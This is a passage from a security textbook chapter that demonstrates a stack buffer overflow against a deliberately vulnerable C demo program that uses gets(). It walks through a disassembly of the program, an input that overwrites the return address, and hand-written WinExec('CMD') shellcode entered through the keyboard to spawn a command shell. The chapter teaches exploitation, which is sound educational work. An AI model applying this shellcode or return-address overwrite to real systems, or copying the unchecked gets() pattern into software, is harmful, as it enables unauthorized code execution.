Practical Example of an Overflow Error | Shellcoders Programming Uncovered (Uncovered series)

Now, having briefly considered the theory, it is time to consider a practical example. Compile the example shown in Listing 8.6 and run it.

Listing 8.6: The example for investigating overflow errors

 #include <stdio.h>
 #include <string.h>

 root()
 {
         printf("your have a root!\n");
 }

 main()
 {
         char passwd[16]; char login[16];

         printf("login :"); gets(login);
         printf("passwd:"); gets(passwd);

         /* note: ~, not !, in the second test; compare NOT EAX in Listing 8.7 */
         if (!strcmp(login, "bob") && ~strcmp(passwd, "god"))
                 printf("hello, bob!\n");
 }

This program prompts the user for a login name and a password. Because it reads user input, it must copy that input into a buffer, and consequently there is the possibility of overflow. So when the program prompts for input, enter the string AAA... (a long string composed of A characters) as the login name and BBB... as the password. The program immediately crashes, displaying the application critical error message (Fig. 8.6). Aha! There is buffer overflow here. Consider it more carefully: Windows states that "The instruction at 0x41414141 referenced memory at 0x41414141." Where does the address 41414141h come from? Why, 41h is the hexadecimal code of the A character. This means that the login name buffer overflowed and that this type of overflow allows control to be passed to arbitrary code, because the EIP register was loaded with the address contained in the tail of the input string. It just so happens that senseless garbage was located at address 41414141h, which caused the processor to throw an exception. This situation can easily be corrected.

Figure 8.6: Reaction of the system to buffer overflow

To begin with, it is necessary to discover which characters of the login name fall into the return address. This goal can be easily achieved using a sequence of distinct characters such as qwerty...zxcvbnm. Enter this string, and the system will inform you that "The instruction at 0x7a6c6b6a referenced memory at ..." Then start HIEW and enter 7A 6C 6B 6A from the keyboard. You'll obtain the following sequence: zlkj. Read backward, this is jklz, which means that the 17th, 18th, 19th, and 20th characters of the login name fell into the return address (on processors of the x86 architecture, the lower byte is written at the smaller address, which means that the machine word is reversed).

Now it is time to quickly disassemble the program under field conditions. The disassembled code is provided in Listing 8.7.

Listing 8.7: Disassembling under the field conditions

 .text:00401150 sub_401150      proc near
 .text:00401150 ; The starting point of the root function ensures
 .text:00401150 ; all functionality required for the hacker.
 .text:00401150 ; The starting address plays the key role
 .text:00401150 ; in passing control. Therefore, it is expedient
 .text:00401150 ; to record it. The root function doesn't need to be
 .text:00401150 ; commented, because this example implements it
 .text:00401150 ; in the form of a "stub."
 .text:00401150 ;
 .text:00401150        PUSH  offset aYourHaveARoot ; format
 .text:00401155        CALL  _printf
 .text:0040115A        POP   ECX
 .text:0040115B        RETN
 .text:0040115B sub_401150      endp
 .text:0040115B
 .text:0040115C _main           proc near        ; DATA XREF: .data:0040A0D0o
 .text:0040115C ; Starting point of the main function
 .text:0040115C
 .text:0040115C var_20  = dword ptr -20h
 .text:0040115C s       = byte  ptr -10h
 .text:0040115C ; IDA has automatically recognized two local variables,
 .text:0040115C ; one of which lies 10h bytes above the bottom of the stack
 .text:0040115C ; frame and the other 20h bytes above it.
 .text:0040115C ; Judging by their size, these are buffers. (What else could
 .text:0040115C ; occupy so many bytes?)
 .text:0040115C
 .text:0040115C argc    = dword ptr  4
 .text:0040115C argv    = dword ptr  8
 .text:0040115C envp    = dword ptr  0Ch
 .text:0040115C ; Arguments passed to the main function are of
 .text:0040115C ; no interest for the moment.
 .text:0040115C
 .text:0040115C        ADD   ESP, 0FFFFFFE0h
 .text:0040115C ; Open the stack frame, subtracting 20h bytes from ESP.
 .text:0040115C ;
 .text:0040115F        PUSH  offset aLogin        ; Format
 .text:00401164        CALL  _printf
 .text:00401169        POP   ECX
 .text:00401169 ; printf("login:");
 .text:00401169 ;
 .text:0040116A        LEA   EAX, [ESP + 20h + s]
 .text:0040116E        PUSH  EAX                  ; The s buffer
 .text:0040116F        CALL  _gets
 .text:00401174        POP   ECX
 .text:00401174 ; gets(s);
 .text:00401174 ; The gets function doesn't control the input string
 .text:00401174 ; length; therefore, the s buffer might overflow.
 .text:00401174 ; Because the s buffer lies at the bottom of the stack frame,
 .text:00401174 ; it is directly followed by the return address; consequently,
 .text:00401174 ; it is overlapped by bytes 11h to 14h of the s buffer.
 .text:00401175        PUSH  offset aPasswd       ; Format
 .text:0040117A        CALL  _printf
 .text:0040117F        POP   ECX
 .text:0040117F ; printf("passwd:");
 .text:0040117F
 .text:00401180        PUSH  ESP                  ; The s buffer
 .text:00401181        CALL  _gets
 .text:00401186        POP   ECX
 .text:00401186 ; The gets function is passed the pointer
 .text:00401186 ; to the stack frame top, where there is the
 .text:00401186 ; var_20 buffer. Because gets doesn't check the
 .text:00401186 ; length of the input string, overflow is possible.
 .text:00401186 ; Bytes 11h to 20h of the var_20 buffer overwrite the s
 .text:00401186 ; buffer, and bytes 21h to 24h fall to the return
 .text:00401186 ; address. Thus, the return address can be modified using
 .text:00401186 ; two different methods, one from the s buffer and the other
 .text:00401186 ; from the var_20 buffer.
 .text:00401187        PUSH  offset aBob          ; The s2 buffer
 .text:0040118C        LEA   EDX, [ESP + 24h + s]
 .text:00401190        PUSH  EDX                  ; The s1 buffer
 .text:00401191        CALL  _strcmp
 .text:00401196        ADD   ESP, 8
 .text:00401199        TEST  EAX, EAX
 .text:0040119B        JNZ   short loc_4011C0
 .text:0040119D        PUSH  offset aGod          ; The s2 buffer
 .text:004011A2        LEA   ECX, [ESP + 24h + var_20]
 .text:004011A6        PUSH  ECX                  ; The s1 buffer
 .text:004011A7        CALL  _strcmp
 .text:004011AC        ADD   ESP, 8
 .text:004011AF        NOT   EAX
 .text:004011B1        TEST  EAX, EAX
 .text:004011B3        JZ    short loc_4011C0
 .text:004011B5        PUSH  offset aHelloBob     ; Format
 .text:004011BA        CALL  _printf
 .text:004011BF        POP   ECX
 .text:004011BF ; Checking the password, from the overflowing buffers
 .text:004011BF ; standpoint, doesn't present anything interesting.
 .text:004011BF ;
 .text:004011C0 loc_4011C0:                       ; CODE XREF: _main + 3F j
 .text:004011C0        ADD   ESP, 20h
 .text:004011C0 ; Close the stack frame.
 .text:004011C0
 .text:004011C3        RETN
 .text:004011C3 ; Retrieving return address and passing control there.
 .text:004011C3 ; Under normal conditions, RETN returns to the parent
 .text:004011C3 ; function. However, in the case of overflow, the return
 .text:004011C3 ; address is modified and different code gains
 .text:004011C3 ; control. As a rule, this will be the shellcode
 .text:004011C3 ; of the intruder.
 .text:004011C3 _main  endp

Having briefly analyzed this disassembled listing, the hacker will detect an interesting root function there. This function allows the hacker to carry out practically anything. The problem is that under normal conditions, it never gains control. However, the hacker can replace the return address with the address of its starting point. And what is the starting address of the root function? Here it is: 00401150h. Reverse the byte order, and you'll get the following: 50 11 40 00. The address is stored in memory in exactly this form. Fortunately, zero is encountered only once and falls exactly at the end. Let it be the terminating zero of an ASCIIZ string. The characters with codes 50h and 40h correspond to P and @. The character with code 11h corresponds to the <Ctrl>+<Q> keyboard shortcut or the following combination: <Alt>+<0, 1, 7> (press and hold the <Alt> key, enter the sequence 0, 1, 7 from the numeric keypad, then release the <Alt> key).

Hold your breath, then restart the program and enter the following string as the login name: "qwertyuiopasdfghP^Q@". The password can be omitted. In general, the characters "qwertyuiopasdfgh" can be chosen arbitrarily. The main issue is to place the sequence "P^Q@" exactly in the 17th, 18th, and 19th positions. There is no need to enter the terminating zero, because the gets function will insert it automatically.

If everything was done correctly, the program will display the "your have a root!" string, thus confirming that the attack was completed successfully. When the root function returns, the program will crash immediately, because the stack contains garbage. This, however, is of no importance, because the root function has already completed its job and is no longer needed.

Figure 8.7: Passing control to the root function

Passing control to a ready-to-use function is simple, but it isn't interesting (furthermore, there might be no such function in the program being attacked). Hackers carry out more efficient attacks by sending their own shellcode to the remote machine and executing it there.

In general, it is not easy to organize a remote shell. To achieve this, the hacker must at least establish a TCP/UDP connection, deceive the firewall, create pipes, map them to the input/output descriptors of the terminal program, and then work as a dispatcher, passing the data between sockets and pipes. Some attackers try a simpler way, attempting to inherit descriptors. However, those who try to use this approach will inevitably be disappointed, because descriptors are not inherited and, consequently, such exploits are unusable. No effort can reanimate them, and all attempts at doing so inevitably fail. In further books, I plan to cover this topic in more detail. For the moment, the discussion will be reduced to the local shell. Even this can be considered a serious achievement for beginners.

Run the demo program again, and overflow the buffer by entering the AAA... string. However, when the critical error dialog appears, instead of clicking the OK button, click Cancel to start the debugger (note that the debugger must already be installed in the system). The contents of the ESP register at the moment of failure are of particular interest. On my machine, it was equal to 0012FF94h, and on your machine this value might be different. Enter this address into the dump window and scroll it up and down to find the input string (AAA...). In my case, this string was located at the following address: 0012FF80h.

Now it is possible to change the return address to 0012FF80h, in which case control will be passed to the first byte of the overflowing buffer. After that, it only remains to prepare the shellcode. To call the command interpreter in the operating systems of the Windows NT family, it is necessary to call WinExec("CMD", x). Under Windows 9x, there is no such file; however, there is command.com. In Assembly language, this call might look as shown in Listing 8.8 (the code can be entered directly in HIEW).

Listing 8.8: Preparing the shellcode

 00000000: 33C0        XOR    EAX, EAX
 00000002: 50          PUSH   EAX
 00000003: 68434D4420  PUSH   020444D43 ;" DMC"
 00000008: 54          PUSH   ESP
 00000009: B8CA73E977  MOV    EAX, 077E973CA ;"wesE"
 0000000E: FFD0        CALL   EAX
 00000010: EBFE        JMPS   000000010

Here, an entire range of tricks and assumptions is used, a detailed description of which would require a separate book. Briefly, 77E973CAh is the address of the WinExec API function, hard-coded into the program and found by analyzing the exports of the kernel32.dll file using the dumpbin utility. This trick is dirty and unreliable, because this address varies from version to version. Thus, more qualified hackers add an export-processing procedure to the shellcode (the procedure itself will be covered in Chapter 11). Why is the called address first loaded into the EAX register? Well, this is because call 077E973CAh is assembled into a relative call sensitive to the location of the call, which reduces the portability of the shellcode.

Why is there a blank in the file name "CMD " (020444D43h, read in reverse order)? This is because the shellcode must not contain a zero character, which serves as the string terminator. If the terminating blank is removed, then the value becomes 00444D43h, which contains a zero byte and doesn't agree with the hacking plan. Instead, it is necessary to carry out xor eax, eax, thus resetting EAX to zero on the fly, and push it onto the stack to form the terminating zero for the "CMD " string. However, the shellcode itself doesn't contain this zero character.

Because the shellcode doesn't fit within the 16 bytes available to it, and because it cannot be optimized any further, it is necessary to resort to lateral troop movement and shift the shellcode into the password buffer, 32 bytes from the return address. Taking into account that the absolute address of the password buffer is equal to 12FF70h (Attention! On your computer this value might be different), the shellcode will appear as shown in Listing 8.9 (simply convert HEX codes into ASCII characters, entering nonprintable characters as <ALT>+<num>, where <num> is the decimal code typed on the numeric keypad).

Listing 8.9: Entering the shellcode from the keyboard

 login :1234567890123456<alt-112><alt-255><alt-18>
 passwd:3<alt-192>PhCMD T<alt-184><alt-202>s<alt-233>w<alt-255><alt-208><alt-235><alt-254>

Enter this code into the program. The codes specific to each individual machine are the return address at the end of the login string and the WinExec address in the password string. The login will overflow the stack and pass control to the password buffer in which the shellcode resides. The command interpreter prompt will appear on the screen. Now it will be possible to do anything to the system.